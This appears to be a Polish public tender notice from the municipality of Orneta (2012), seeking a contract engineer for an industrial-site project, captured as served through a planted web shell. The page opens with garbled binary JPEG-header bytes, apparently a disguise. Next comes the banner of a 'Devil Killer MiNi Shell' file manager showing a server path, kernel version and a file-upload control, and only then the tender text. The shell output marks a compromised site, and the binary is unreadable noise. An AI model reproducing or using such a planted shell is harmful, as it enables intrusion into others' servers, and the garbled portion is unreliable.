JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120111/9684-N-2012.html

<p class="kh_header"><b>Orneta: Pełnienia funkcji  Inżyniera Kontraktu dla Projektu Kompleksowe przygotowanie terenów inwestycyjnych przy ul. Przemysłowej w Ornecie</b><br>
<b>Numer ogłoszenia: 9684 - 2012; data zamieszczenia: 11.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienia funkcji  Inżyniera Kontraktu dla Projektu Kompleksowe przygotowanie terenów inwestycyjnych przy ul. Przemysłowej w Ornecie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest  usługa pełnienia funkcji  Inżyniera Kontraktu dla Projektu Kompleksowe przygotowanie terenów inwestycyjnych przy ul. Przemysłowej w Ornecie, który  realizowany będzie w formule zaprojektuj i wybuduj  zwanego dalej  Projektem. 
Projekt  dofinansowany jest  z Europejskiego Funduszu Rozwoju Regionalnego w ramach: 
-   Regionalnego Programu Operacyjnego Warmia i Mazury 2007-2013 
Oś priorytetowa 1 Przedsiębiorczość
Działanie 1.1 Wzrost konkurencyjności przedsiębiorstw
Poddziałanie 1.1.10 Przygotowanie stref przedsiębiorczości
-   Programu Operacyjnego Innowacyjna Gospodarka  2007-2013
Oś priorytetowa 6 Polska gospodarka na rynku międzynarodowym
Działanie: 6.2. Rozwój sieci centrów obsługi inwestorów i eksporterów oraz powstanie nowych terenów inwestycyjnych
Poddziałanie 6.2.2 Wsparcie działań studyjno-koncepcyjnych w ramach przygotowania terenów inwestycyjnych dla projektów inwestycyjnych
2.Przedmiot Projektu obejmuje opracowanie  dokumentacji projektowej i wykonanie robót budowlanych opisanych szczegółowo w Programie Funkcjonalno - Użytkowym, stanowiącym załącznik 2 Rozdziału III SIWZ Opis przedmiotu zamówienia.
Skrócony opis przedmiotu Projektu przedstawiony został w § 2 Opisu przedmiotu  zamówienia Rozdziału III  SIWZ Opis przedmiotu  zamówienia 
3.Zakres usługi pełnienia funkcji  Inżyniera Kontraktu dla Projektu będzie realizowany w trzech etapach: 
Etap I: Faza przetargowa i projektowa
Etap II: Faza organizacji i wykonania robót budowlanych, sprawozdawczości, rozliczeń finansowych, promocji, odbiorów i  oddania do użytkowania
Etap III: Faza rękojmi za wady i gwarancji  jakości udzielonej przez wykonawcę Projektu
i o b e j m u j e : 
1)  zarządzanie Projektem w imieniu i na rzecz Zamawiającego w ścisłej z nim współpracy mające na względzie prawidłowe przygotowanie, realizowanie i ukończenie Projektu , które będzie obejmowało w szczególności:
a) organizację,
b) koordynację,
c) nadzór,
d) monitoring, raportowanie i sprawozdawczość w zakresie rzeczowym, czasowym i finansowym, 
2) przygotowanie i przeprowadzenie postępowania o udzielenie zamówienia publicznego na zaprojektowanie i wybudowanie Projektu
3)  ścisła współpraca z autorami Programu Funkcjonalno-Użytkowego Projektu przy wykonywaniu czynności  związanych :
a) z przygotowaniem i przeprowadzeniem postępowania  o udzielenie zamówienia  publicznego na zaprojektowanie i wybudowanie Projektu ,
b) z opracowaniem dokumentacji projektowej 
oraz z Wykonawcą Projektu w zakresie sprawowanego przez niego nadzoru autorskiego;
4) profesjonalny i kompetentny nadzór inwestorski nad dokumentacją projektową i robotami budowlanymi we wszystkich branżach zgodnie z przepisami prawa obowiązującego w Polsce, w szczególności z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn.: Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), poprzez wyznaczenie ze swego grona inspektorów nadzoru inwestorskiego (art.25 i art.26) i zapewnienie koordynacji ich pracy (art. 27); 
5) administrowanie i koordynowanie wszystkich Kontraktów zawartych w ramach Projektu; 
6)   zarządzanie, monitorowanie i kontrola postępu wykonania Kontraktów pod względem organizacyjnym, technicznym,  czasowym i finansowym wraz z raportowaniem, które będzie uwzględniać zarówno wskaźniki fizyczne jak i finansowe, koszty, terminy, kontrolę budżetu i działania zapobiegawcze (jeśli będą konieczne). 
7)   rozliczenie rzeczowe i finansowe (częściowe, końcowe) Kontraktów, Projektu. 
8)   sporządzanie wniosków o płatność, harmonogramów płatności,  raportów  i sprawozdań
9)   natychmiastowe informowanie Zamawiającego o wszystkich zaistniałych problemach oraz o problemach mogących zaistnieć (w szczególności o wszelkich dostrzeżonych nieprawidłowościach i zagrożeniach co do jakości, zakresu i terminowości realizacji Kontraktu na opracowanie dokumentacji projektowej i wykonanie robót budowlanych), wraz ze sposobami ich rozwiązywania i/lub działaniami korygującymi mającymi na celu usuwanie takich problemów; 
10)  wsparcie prawne w zakresie zaistniałych problemów na każdym etapie usługi pełnienia funkcji Inżyniera kontraktu;
11)  prowadzenie, przechowywanie i archiwizacja (również na nośniku elektronicznym) korespondencji z podmiotami biorącymi udział w realizacji Kontraktów ze szczególnym uwzględnieniem ostrzeżeń, uwag i wniosków kierowanych do wykonawcy Projektu  mogących być dowodami w razie ewentualnych sporów, roszczeń wykonawcy robót, katastrof budowlanych itp.; 
12)  polubowne rozstrzyganie wszelkich sporów powstałych pomiędzy stronami Kontraktów; 
13)  szacowanie i weryfikowanie jeśli zajdzie taka konieczność robót zamiennych i/lub uzupełniających i/lub dodatkowych  zaproponowanych przez Wykonawcę Projektu, w zakresie wartości rzeczowych i finansowych, z uwzględnieniem konieczności stosowania przez Zamawiającego ustawy Prawo zamówień publicznych; 
14)  prowadzenie technicznego, finansowego, czasowego i administracyjnego nadzoru nad robotami budowlanymi, egzekwowanie zgodności prowadzonych robót z: 
a)opracowanym przez Wykonawcę Projektu Programem Zapewnienia Jakości Robót, 
b)pozwoleniem na budowę, pozwoleniem na realizację inwestycji drogowej, pozwoleniem wodnoprawnym
c)projektem (budowlanym i wykonawczym), 
d)wszystkimi dokumentami stanowiącymi integralne części projektu
d)obowiązującym prawem, normami
e)zasadami wiedzy inżynierskiej, 
f)harmonogramem rzeczowo - finansowym Projektu sporządzonym przez Wykonawcę Projektu, 
g)harmonogramem rzeczowo - finansowym realizacji Projektu, stanowiącym załącznik do umów o dofinansowanie projektu,
h)procedurami obowiązującymi przy realizacji projektów finansowanych w ramach Europejskiego  
Funduszu Rozwoju Regionalnego,
i)wymaganiami i wytycznymi Instytucji Zarządzającej (IZ) Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 oraz Instytucji Zarządzającej (IZ) i Instytucji Wdrażającej (IW)/Instytucji Pośredniczącej II (IPII) Programu Operacyjnego Innowacyjna Gospodarka 2007-2013
j)wszystkimi dokumentami stanowiącymi integralne części Projektu,
k)warunkami umów zawartych przez Zamawiającego z: Wykonawcą Projektu oraz umowami o dofinansowanie Projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach:Regionalnego Programu Operacyjnego Warmia i Mazury 2007-2013 i Programu Operacyjnego Innowacyjna Gospodarka  2007-2013;
15)  prowadzenie działań informacyjnych i promocyjnych Projektu w zakresie wynikającym ze szczegółowego zakresu pełnienia funkcji Inżyniera kontraktu ;
16)  realizacja zobowiązań, praw i obowiązków  Zamawiającego związanych z realizacją Projektu i wynikających w szczególności:
a)z umów zawartych przez Zamawiającego o dofinansowanie Projektu: z Województwem Warmińsko-Mazurskim nr UDA-RPWM.01.01.10-28-003/11-00 z dnia 29.12.2011r. oraz  Ministrem Gospodarki nr POIG.06.02.02-00-074/11-00 z dnia 13.10.2011r.
b)z wniosków o dofinansowanie Projektu ze środków  Europejskiego Funduszu Rozwoju Regionalnego w ramach:  Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 nr WND-RPWM.01.01.10-28-003/11 wraz z załącznikami, oraz Programu Operacyjnego Innowacyjna Gospodarka  nr POIG.06.02.02-00-074/11 wraz z załącznikami
c)z wytycznych i zaleceń Instytucji Zarządzającej (IZ) Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 oraz Instytucji Zarządzającej (IZ) i Instytucji Wdrażającej (IW)/Instytucji Pośredniczącej II (IPII) Programu Operacyjnego Innowacyjna Gospodarka 2007-2013
d)z obowiązujących przepisów prawa, w tym przepisów ustawy Prawo budowlane, ustawy Prawo zamówień publicznych
17)wspierania działań Zamawiającego we wszystkich czynnościach organizacyjnych, technicznych, administracyjnych i finansowych w trakcie realizacji Projektu oraz związanych z realizacją i kontrolą Projektu po jego zakończeniu przez służby kontrolne 
18)  wykonywanie w imieniu i na rzecz Zamawiającego praw i obowiązków Zamawiającego z tytułu rękojmi i gwarancji w stosunku do Wykonawcy Projektu przez okres 5 lat liczonych od daty zakończenia rzeczowego realizacji Projektu (daty podpisania końcowego protokołu odbioru);
19) występowanie w imieniu i na rzecz Zamawiającego przed organami administracji i przed sądami, w sprawach wynikających z realizacji Projektu, w granicach udzielonych pełnomocnictw;
20)udział, na żądanie Zamawiającego, w kontrolach dotyczących realizacji Projektu, przeprowadzanych przez Instytucję Zarządzającą (IZ) Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 oraz Instytucję Zarządzającą (IZ) i Instytucję Wdrażającą (IW)/Instytucję Pośredniczącą II (IPII) Programu Operacyjnego Innowacyjna Gospodarka 2007-2013  oraz inne podmioty zewnętrzne uprawnione do jej przeprowadzenia na podstawie odrębnych przepisów i przedstawianie na bieżąco  wszelkich informacji, dokumentów i wyjaśnień; 
21)stosowanie się do obowiązujących i aktualnych wzorów dokumentów oraz informacji zamieszczonych w szczególności na stronie internetowej Instytucji Zarządzającej (IZ) Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 oraz Instytucji Zarządzającej (IZ) i Instytucji Wdrażającej (IW)/Instytucji Pośredniczącej II (IPII) Programu Operacyjnego Innowacyjna Gospodarka 2007-2013  w ramach realizacji zadania inwestycyjnego;
22)prowadzenie korespondencji związanej z realizacją Projektu;
23)kontrolowanie prawidłowego prowadzenia dokumentów budowy,
24)gromadzenie, przechowywanie, ewidencjonowanie i zabezpieczanie dokumentacji związanej z realizacją Projektu (w tym między innymi: korespondencji, dokumentacji aplikacyjnej, monitoringowej, kontrolnej, fotograficznej z postępu robót, audytowej, umów o dofinansowanie wraz z aneksami) oraz protokolarne przekazanie tej dokumentacji Zamawiającemu po zakończeniu Projektu lub rozwiązaniu umowy z Zamawiającym,
25)pełnienia funkcji Inżyniera zgodnie z przepisami polskiego prawa w tym: Prawa Budowlanego wraz z przepisami wykonawczymi, Prawa Zamówień Publicznych wraz z przepisami wykonawczymi, Kodeksu Cywilnego,  wymaganiami Warunków Kontraktowych FIDIC (żółta książka), procedurami Europejskiego Funduszu Rozwoju Regionalnego Unii Europejskiej; 
26)  udzielanie Zamawiającemu odpowiedzi - na piśmie, w terminie do 3 dni roboczych liczonych od dnia otrzymania wniosku, pisma lub innego dokumentu;
27)  zatwierdzenie przez Zamawiającego dokumentów i decyzji na każdym etapie pełnienia funkcji Inżyniera kontraktu,  nie zwalnia Inżyniera kontraktu z odpowiedzialności za prawidłowość tych dokumentów i decyzji, w szczególności z rękojmi za wady, kar umownych
4.   Szczegółowy zakres pełnienia funkcji Inżyniera Kontraktu  dla Projektu przedstawiony został w załączniku Nr 1 Szczegółowy  zakres  pełnienia funkcji Inżyniera Kontraktu  Rozdziału  III  SIWZ  Opis przedmiotu   zamówienia, a planowane terminy realizacji usługi, warunki płatności , wartość szacunkowa Projektu  przedstawiony został w § 3, 4 i 5 Opisu przedmiotu zamówienia  Rozdziału III SIWZ Opis  przedmiotu zamówienia  
5.Zakres usługi pełnienia funkcji Inżyniera kontraktu wymieniony w ust. 3 niniejszego paragrafu należy traktować łącznie ze szczegółowym zakresem pełnienia funkcji Inżyniera kontraktu  przedstawionym w Załączniku nr 1 Szczegółowy  zakres  pełnienia funkcji Inżyniera Kontraktu  Rozdziału III  SIWZ Opis przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy Pzp. Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2, 71.52.00.00-9, 71.54.00.00-5, 71.30.00.00-1, 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty  oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj  Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  wykaże, że:  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie wykonał należycie :
-  co najmniej 2 lub więcej usług polegających na pełnieniu funkcji inżyniera kontraktu lub/i inwestora zastępczego lub/i  inspektora nadzoru inwestorskiego   nad  realizacją  kontraktów na roboty budowlane, które spełniają łącznie  następujące warunki : 
a)  łączna wartość brutto co najmniej 2 lub więcej nadzorowanych kontraktów na roboty budowlane nie mniejsza  niż 16 000 000 zł  
b)  i łączny zakres rzeczowy co najmniej 2 lub więcej nadzorowanych kontraktów na roboty budowlane obejmował co najmniej :  
               -  budowę,  przebudowę lub rozbudowę  drogi/dróg 
               -  budowę,  przebudowę lub rozbudowę  sieci wodociągowej, 
               -  budowę,  przebudowę lub rozbudowę  sieci kanalizacji sanitarnej, 
               -  budowę,  przebudowę lub rozbudowę  sieci kanalizacji deszczowej, 
               -  budowę,  przebudowę lub rozbudowę  sieci telekomunikacyjnej,
               -  budowę,  przebudowę lub rozbudowę  sieci oświetlenia ulicznego 
Dopuszcza się możliwość wykazania posiadanego doświadczenia zarówno dla nadzoru  kompleksowego obejmującego cały w/w zakres rzeczowy w ramach jednego kontraktu na roboty budowlane, jak i  nadzory prowadzone dla poszczególnych wymaganych  elementów zakresu rzeczowego w ramach kilku odrębnych kontraktów na roboty budowlane .
Za usługi wykonane rozumie się takie, w ramach których nadzorowane kontrakty na roboty budowlane / inwestycje zostały zakończone tj. dla nadzorowanych robót  budowlanych zostały wydane protokoły odbioru robót, Świadectwa Przejęcia lub inne dokumenty o równoważnym  znaczeniu.
Ocena spełnienia warunku  nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych  w  § 6 ust. 1 pkt 2 IDW tj Wykazu wykonanych  usług w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie podaniem ich  wartości, przedmiotu , dat   wykonania i odbiorców sporządzonego wg Załącznika nr 5 do IDW wraz z dołączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty  oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj  Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osobami odpowiedzialnymi za świadczenie usługi,  kontrolę jakości, kierowanie robotami budowlanymi  tj. dysponuje lub będzie dysponował osobami na pełnienie co najmniej n/w funkcji:
  a) 1 Kierownik Zespołu Inżyniera Kontraktu posiadający:
       -   wykształcenie wyższe techniczne; 
       -   co najmniej  5-letnie doświadczenie zawodowe na stanowiskach kierowniczych w  bezpośrednim kierowaniu,  zarządzaniu lub nadzorowaniu realizacji inwestycji budowlanych 
       -   doświadczenie na stanowisku kierowniczym (np. w pełnieniu funkcji Kierownika  Zespołu Inżyniera i/lub Kierownika Projektu lub/i Inżyniera Rezydenta lub/i kierownika budowy lub/i  kierownik robót  itp.) przy realizacji co najmniej jednej zakończonej inwestycji o wartości brutto nie mniejszej niż  8  000 000 zł, 
                -   znajomość i doświadczenie w zakresie stosowania Warunków FIDIC lub równoważnych,
- 	znajomość procedur przetargowych oraz kontraktowania na podstawie ustawy Prawo zamówień publicznych 
    b) 1 inspektor nadzoru inwestorskiego (branża drogowa) posiadający: 
         -   wykształcenie wyższe techniczne
         -   min. 5 letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w   budownictwie jako inspektor nadzoru  i/lub kierownik budowy, kierownik robót 
      -   uprawnienia budowlane w specjalności drogowej bez ograniczeń lub  odpowiadające im  ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa,   
                      c) 1 inspektor nadzoru inwestorskiego (branża elektryczna) posiadający:
          -   min 5 letnie  doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w budownictwie jako inspektor nadzoru i/lub kierownik budowy, kierownik robót
          -   uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, urządzeń  elektrycznych i elektroenergetycznych lub  odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa      
     d) 1 inspektor nadzoru inwestorskiego (branża sanitarna) posiadający: 
          -   min. 5 letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w  budownictwie jako inspektor nadzoru  i/lub kierownik budowy, kierownik robót
         -   uprawnienia  budowlane w specjalności instalacyjnej w  zakresie sieci wodociągowych i  kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane   na podstawie wcześniej  obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa  , 
      e) 1 inspektor nadzoru inwestorskiego (branża telekomunikacyjna) posiadający:
          -   min. 2 letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w budownictwie jako inspektor nadzoru i/lub kierownik budowy/ kierownik robót
          -   uprawnienia  budowlane w specjalności telekomunikacyjnej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej  obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa , 
    f) 1 specjalista do spraw rozliczeń finansowych inwestycji posiadający: 
        -   wykształcenie średnie lub wyższe 
        -   co najmniej 2 lata doświadczenia na stanowisku związanym z rozliczaniem inwestycji              
        -   doświadczenie w rozliczeniu dokumentacyjno - finansowym, sprawozdawczości,  monitoringu w zakresie co najmniej jednej zakończonej inwestycji współfinansowanej ze środków Unii  Europejskiej o wartości brutto nie mniejszej niż 4 000 000 zł
UWAGA: 
1)Przez doświadczenie zawodowe (w przypadku stanowisk, dla których wymagane jest posiadanie uprawnień budowlanych) należy rozumieć okres od daty uzyskania stosownych uprawnień do daty składania oferty.
2)Zamawiający dopuszcza łączenie maksymalnie 2 funkcji  przez 1 osobę w   
 przypadku, gdy przewidziana przez Wykonawcę dana osoba posiada łącznie wymagane: kwalifikacje zawodowe, wykształcenie i  doświadczenie zawodowe. 
3)Osoby będące obywatelami krajów członkowskich Unii Europejskiej, a wskazane jako osoby od których wymagane są stosowne uprawnienia budowlane, powinny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia - zgodnie z Ustawą z dnia 18 marca 2008r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. z 2008 roku nr 63, poz.394).
      
Ocena spełnienia warunku nastąpi nas podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w § 6 ust. 1 pkt 3 i 4  IDW tj Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia sporządzonego wg  Załącznika nr 6 i 6.1 do IDW,  oświadczenia, że osoby które będą uczestniczyć w wykonaniu zamówienia wymienione w załączniku nr 6 do IDW posiadają wymagane uprawnienia sporządzonego wg załącznika nr 6.2 do IDW</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty  oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj  Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li></ul>
